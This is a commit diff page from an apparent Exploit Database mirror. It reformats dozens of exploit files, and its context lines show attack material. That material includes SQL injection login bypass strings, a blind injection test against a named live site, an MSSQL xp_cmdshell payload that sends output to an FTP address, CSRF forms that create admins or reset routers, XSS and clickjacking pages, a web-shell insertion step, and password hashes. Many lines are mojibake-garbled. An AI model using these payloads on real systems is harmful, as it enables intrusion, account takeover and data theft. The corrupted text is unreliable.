bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-08-20

Browse source 
204 changes to exploits/shellcodes

Charity Management System CMS 1.0 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2021-08-20 05:01:51 +00:00
parent 6f730aa235
commit 4e7ab00187
205 changed files with 1446 additions and 1318 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/aix/dos/35342.txt
View file

@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
// dans tous les cas :
echo "<p class='normal'><a class='erreur'> ";
echo "<p class='normal'><a class='erreur'> ";
$msg = "";
// test du nom

4
exploits/aix/webapps/11580.txt
View file

@ -54,8 +54,8 @@ Add/Edit Admin CSRF:
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>

10
exploits/aix/webapps/14058.html
View file

@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
</td>
<td>
   </td>
</td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
   </td>
</td>
<td>
Resource Type<br />
@ -96,16 +96,16 @@ Resource Type<br />
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
   </td>
</td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
   </td>
</td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
   </td>
</td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post"
enctype="multipart/form-data">

2
exploits/asp/webapps/11295.txt
View file

@ -11,7 +11,7 @@ Arbitrary File Upload
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload>  </p>
<input type=submit value=Upload> </p>
</form>

4
exploits/asp/webapps/12471.txt
View file

@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
<input type=text name=Adminlevel value="Root">
</td>
</tr>
<td width="168"> </td>
<td width="220"> </td>
<td width="168"> </td>
<td width="220"> </td>
</tr>
<tr>
<td colspan="2">

4
exploits/asp/webapps/13891.html
View file

@ -22,8 +22,8 @@ Sex
</select>
</p>
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
</form>
</frewal>

2
exploits/asp/webapps/17015.txt
View file

@ -7,7 +7,7 @@
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
# Demo:
http://site.com/Examples/PowUpload/Simpleupload.htm
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
Login-Root, KikoArg, Ricota,

2
exploits/asp/webapps/17016.txt
View file

@ -6,7 +6,7 @@
# Software: EAFlashUpload v 2.5
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
Login-Root, KikoArg, Ricota,

6
exploits/asp/webapps/3493.txt
View file

@ -194,16 +194,16 @@ MSSQL CMD Injection Exploit(For DBO Users) :
<tr>
<center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
<center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
<td> </td>
<td> </td>
<td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
</tr>
<tr>
<td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
<td> </td>
<td> </td>
<td>
<select name="">
<option value="0">(CMD)</option>
</select> <br><br>
</select> <br><br>
<input type="submit" value="Apply"></center>
</td>
</tr>

4
exploits/asp/webapps/7277.txt
View file

@ -1,4 +1,4 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~] ----------------------------بسم الله الرحمنالرحيم------------------------------
 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
 Â
 [~]Vendor: www.activewebsoftwares.com
@ -30,7 +30,7 @@
Â
 [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
 [~]
 [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
 [~] spechial thanks : dolly & 7am3m & عماد ,الزهيرÙÅ
 [~]
 [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
 [~]

20
exploits/asp/webapps/7423.txt
View file

@ -4,25 +4,25 @@
[~] Vendor: www.adserversolutions.com
[☠] Software: Affiliate Software Java 4.0
[☠] Software: Affiliate Software Java 4.0
[☠] author: ((я3d D3v!L))
[☠] author: ((я3d D3v!L))
[☠] Date: 12.12.2008
[☠] Date: 12.12.2008
[☠] Home: www.ahacker.biz
[☠] Home: www.ahacker.biz
[☠] contact: N/A
[☠] contact: N/A
[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[☠] ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[☠] Exploit:
[☠] Exploit:
☠ username: r0' or ' 1=1--
☠ password: r0' or ' 1=1--
☠username: r0' or ' 1=1--
☠password: r0' or ' 1=1--
[☠]login 4 d3m0:
[☠]login 4 d3m0:
http://www.adserversolutions.com/affiliate_java/logon.jsp

4
exploits/asp/webapps/7424.txt
View file

@ -14,7 +14,7 @@
[~] contact: N/A
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[~] Exploit:
@ -22,7 +22,7 @@
[~] password: r0' or ' 1=1--
[☠] login 4 d3m0:
[☠] login 4 d3m0:
www.adserversolutions.com/admgmt_460/logon.jsp

4
exploits/asp/webapps/7425.txt
View file

@ -14,7 +14,7 @@
[~] contact: N/A
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[~] Exploit:
@ -22,7 +22,7 @@
[~] password: r0' or ' 1=1--
[☠]login 4 d3m0:
[☠]login 4 d3m0:
www.adservingsolutions.com/xchange_java/logon_license.jsp

50
exploits/asp/webapps/9675.txt
View file

@ -1,42 +1,42 @@
[☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
[☠]
[☠]
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
[☠]
[☠]
[~] Vendor: www.hotwebscripts.co.uk
[☠]
[☠] Software: HotWeb Rentals
[☠]
[☠] author: ((я3d D3v!L))
[☠]
[☠] Date: 15.2.2009
[☠]
[☠] Home: CL053D
[☠]
[☠] contact: X@hotmail.co.jp
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
[☠]
[☠] Software: HotWeb Rentals
[☠]
[☠] author: ((я3d D3v!L))
[☠]
[☠] Date: 15.2.2009
[☠]
[☠] Home: CL053D
[☠]
[☠] contact: X@hotmail.co.jp
[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠â˜
[☠] ERR0R CONSOLE
[☠] ERR0R CONSOLE
WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
[☠] Exploit:
[☠] Exploit:
[☠] TRU3 : details.asp?PropId=1+and+1=1
[☠] TRU3 : details.asp?PropId=1+and+1=1
[☠] FALS3 : details.asp?PropId=1+and+1=2
[☠] FALS3 : details.asp?PropId=1+and+1=2
[☠]liv3 3xpL0!T:
[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
[☠]liv3 3xpL0!T:
[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
[☠]
[☠]
N073:
R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
4R48!4N-HACK3R!!القراصنه العرب
@ -46,9 +46,9 @@ R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
[~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y
[☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
[☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
[~]spechial FR!ND: 74M3M تميم

2
exploits/hardware/dos/11769.py
View file

@ -36,7 +36,7 @@ def main():
</head>
<body onLoad="triggerCrash()">
<div id="evilDiv">
 
</div>
</body>
</html>

2
exploits/hardware/local/24899.txt
View file

@ -14,7 +14,7 @@ The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performanc
failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
features set.
########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency.
############################Advisory:###################################################

16
exploits/hardware/webapps/26401.txt
View file

@ -26,8 +26,8 @@ Exploit:
<tbody><tr><td class="headerbg">Factory Reset</td></tr>
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
</tbody></table><br> 
<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
</tbody></table><br>
<input name="Factory" value=" Yes " type="submit" width="60">
</form>
@ -41,7 +41,7 @@ Exploit:
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
<td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
<td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
<td bgcolor="#F0F0F0" valign="top">
<table border="0">
<tbody><tr><td>
@ -49,15 +49,15 @@ Exploit:
<table border="0" cellpadding="3" cellspacing="0">
<tbody><tr>
<td width="20"></td><td>IP Address</td>
<td>:  <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
<td>: <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
</tr>
<tr>
<td></td><td>Subnet Mask</td>
<td>:  <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
<td>: <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
</tr>
<tr>
<td></td><td>Default Gateway</td>
<td>:  <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
<td>: <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
</tr>
</tbody></table>
</td></tr>
@ -68,8 +68,8 @@ Exploit:
</tbody></table>
<table border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
<td height="50" width="149"> </td>
<td width="355"> <input name="Config2" value=" Save " type="submit" width="80">  <input value="Cancel" type="reset" width="80"></td>
<td height="50" width="149"> </td>
<td width="355"> <input name="Config2" value=" Save " type="submit" width="80"> <input value="Cancel" type="reset" width="80"></td>
</tr>
</tbody></table>
</form>

8
exploits/hardware/webapps/32943.txt
View file

@ -2,11 +2,11 @@
# Date: 20-04-2014
# Author: Rakesh S
# Software Link: http://www.teracom.in/
# Version:  T2-B-Gawv1.4U10Y-BI
# Version: T2-B-Gawv1.4U10Y-BI
The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
 
The exploitation example below changes password for the SSID:
 
 
<a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>

6
exploits/hardware/webapps/44935.txt
View file

@ -1,6 +1,6 @@
# Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
# Date: 2018-06-24
# Vendor Homepage:  http://www.digisol.com
# Vendor Homepage: http://www.digisol.com
# Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
# Category: Hardware
# Exploit Author: Adipta Basu
@ -8,9 +8,9 @@
# Web: https://hackings8n.blogspot.com
# Tested on: Mac OS High Sierra
# CVE: CVE-2018-12705
 
# Reproduction Steps:
 
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
- Open BurpSuite

12
exploits/hardware/webapps/44955.txt
View file

@ -1,17 +1,17 @@
# Exploit Title: DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting
# Date: 2018-06-25
# Vendor Homepage:  http://www.digisol.com
# Vendor Homepage: http://www.digisol.com
# Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
# Category: Hardware
# Exploit Author: Adipta Basu
# Tested on: Mac OS High Sierra
# CVE: N/A
 
# Reproduction Steps:
 
   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
   - Open BurpSuite
- Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
- Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
- Open BurpSuite
- Change the SSID to "Testing" and hit "Apply"
- Burp will capture the intercepts.
- Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is

2
exploits/hardware/webapps/45037.txt
View file

@ -104,7 +104,7 @@ testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
<input type="hidden" name="save" value=" Save Changes " />
<input type="hidden" name="save" value=" Save Changes " />
<input type="submit" value="Submit request" />
</form>
</body>

2
exploits/hardware/webapps/45038.txt
View file

@ -155,7 +155,7 @@ START=90
ftpd &
" />
<input type="hidden" name="save" value=" Save Changes " />
<input type="hidden" name="save" value=" Save Changes " />
<input type="submit" value="Submit request" />
</form>
</body>

2
exploits/ios/dos/37660.txt
View file

@ -21,7 +21,7 @@ use threads;
use LWP::UserAgent;
print "    Mohammad Reza Espargham\n   www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n";
print " Mohammad Reza Espargham\n www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n";
$port=8080; #port

2
exploits/ios/webapps/27188.txt
View file

@ -129,7 +129,7 @@ Add Directory</a> | <a id="AllSelect" href="javascript:selectAll()">Select All
| <a href="javascript:if(confirm('Are%20you%20sure%20to%20delete?'))delPhoto();"
id="del" style="color:#F30;">Delete</a></span>
<span style="position:absolute; left:10px;">Photos/ ><[PERSISTENT INJECTED SCRIPT CODE VIA ADD DIRECTORY NAME]">/
   <a href="javascript:window.location.href='..'"
<a href="javascript:window.location.href='..'"
style="color:#F60"> <<Up
Level</a></span><span id="photoCount"></span>

2
exploits/java/webapps/43733.rb
View file

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
'Description' => %q{
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
},
'Author' => [ 'Bjoern Schuette' ],
'License' => MSF_LICENSE,

13
exploits/jsp/remote/18179.html
View file

@ -2,9 +2,9 @@
# Date:30/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.ibm.com/
# Version:8.5.3/8.5.2 FP3 (0day) 
# Version:8.5.3/8.5.2 FP3 (0day)
# Tested on: Windows 7 / Windows 2008
# CVE : CVE-2011-1519
# CVE : CVE-2011-1519
Application: IBM Lotus Domino Controller
@ -12,7 +12,7 @@ Versions Affected: <=8.5.2 FP3, <=8.5.3
Manager 4.0 prior to Update 4
(0day)
Vendor URL: http://ibm.com
Bug: own XML parser  
Bug: own XML parser
CVE: CVE-2011-1519
CVSS2: 9.0
Exploits: YES
@ -23,7 +23,7 @@ Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,
but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.
Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
EXPLOIT:
@ -66,8 +66,3 @@ height = "99%"
</applet>
</body>
</html>
 

2
exploits/jsp/webapps/21545.txt
View file

@ -4,7 +4,7 @@ CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF 
# CVE : CVE-2012-4051 for the CSRF
<head>

6
exploits/linux/local/19517.pl
View file

@ -14,9 +14,9 @@ highlighted remember password.
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]

4
exploits/linux/remote/18145.py
View file

@ -132,8 +132,8 @@ addr_os = {
# ID # OS # STACK SIZE # GADGET TABLE
1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
2 : ["Labs test ", 0xbf, labs_rop_chain],
-1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb
-2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb
-1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb
-2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb
-3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
-4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
-5 : ["Ubuntu 10.10 | 11.04 ", -1, False], #

2
exploits/linux/remote/364.pl
View file

@ -38,7 +38,7 @@ print "Sent\n";
while (<$remote>)
{
 print $_;
print $_;
}
print "\n";

2
exploits/linux/webapps/34241.txt
View file

@ -16,7 +16,7 @@ While logged in as admin user:
3) log in as that user
4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh

2
exploits/linux/webapps/49321.py
View file

@ -2,7 +2,7 @@
# Date: 12/12/2020
# Exploit Author: IHTeam
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
# Vendor Homepage: https://www.terra-master.com/
# Vendor Homepage: https://www.terra-master.com/
# Version: <= 4.2.06
# Tested on: 4.1.30, 4.2.06

6
exploits/multiple/dos/10870.html
View file

@ -30,9 +30,9 @@ Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong
<br>
<br>
<br>
                           <font style="font-family:arial;font-size:32px">Look Here<br>
                   | <br>
                  V
<font style="font-family:arial;font-size:32px">Look Here<br>
| <br>
V
<script>

6
exploits/multiple/remote/14386.html
View file

@ -8,7 +8,7 @@ Opera</font><font face="Calibri" size="6" color="#FF0000">
<font face="Arial" size="2"><code class="xml plain">
(V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@ -32,8 +32,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

6
exploits/multiple/remote/14387.html
View file

@ -8,7 +8,7 @@ Safari</font><font face="Calibri" size="6" color="#FF0000">
<font face="Arial" size="2"><code class="xml plain">
(V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@ -33,8 +33,8 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

6
exploits/multiple/remote/14388.html
View file

@ -7,7 +7,7 @@
<font face="Arial" size="2"><code class="xml plain">
(V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@ -31,8 +31,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

12
exploits/multiple/webapps/11527.html
View file

@ -11,9 +11,9 @@ Create Database:
<td><div id="dbname_error"></div></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td><center><input type="submit" id="submit_dbname" value="Create Database" class="input-button" /></center></td>
<td> </td>
<td> </td>
</tr>
</table>
</div>
@ -36,9 +36,9 @@ Add Redirect:
http://<span id="wwwtxt">(www.)?</span><select name="domain" onChange="EnableDisableRadio();">
<option selected value=".*">** All Public Domains **</a>
<option value="siteismi.com">sEc-r1z.com</option></select>
</select>/ <input name=path type=text size="20" id="urlpath">
 <br />redirects to&#8594; 
<input id="url" name="url" type="text" size="50">  
</select>/ <input name=path type=text size="20" id="urlpath">
<br />redirects to&#8594;
<input id="url" name="url" type="text" size="50">
<br />
<noscript>
@ -66,7 +66,7 @@ Add Redirect:
</p>
</form></div>
<p class="description">
<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
</p>
<!-- <br /> -->
<h2>Current Redirects</h2>

6
exploits/multiple/webapps/18431.txt
View file

@ -6,15 +6,15 @@
# Software: Ajax Upload
# http://valums.com/ajax-upload/
# Tested on: Linux
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Inyexion, Login-Root, KikoArg, Ricota, Truenex, _tty0, Big,
Sunplace,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet,
Cereal, Yago, Rash, MagnoBalt, El Rodrix,NetT0xic,Gusan0r,Lucas Apa,
Maxi Soler, Darioxchx,r0dr1,Zer0-Zo0rg
 
 
[Arbitrary File Upload]
You can upload any file you want by bypasss extesion wing headers, if

34
exploits/multiple/webapps/43123.txt
View file

@ -1,18 +1,18 @@
# Exploit Title: Logitech Media Server : HTML code injection and execution.
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
 
 
 
# Exploit Title: Logitech Media Server : HTML code injection and execution.
# Shodan Dork: Search Logitech Media Server
# Date: 11/03/2017
# Exploit Author: Dewank Pant
# Vendor Homepage: www.logitech.com
# Version: 7.9.0
# Tested on: Windows 10, Linux
# CVE : Applied For.
POC:
 
1. Access and go to the Radio URL tab and add a new URL.
2. Add script as the value of the field.
3. Payload : <script> alert(1)</script>
4. Script saved and gives an image msg with a javascript execution on image click.
5. Therefore, Persistent XSS.
1. Access and go to the Radio URL tab and add a new URL.
2. Add script as the value of the field.
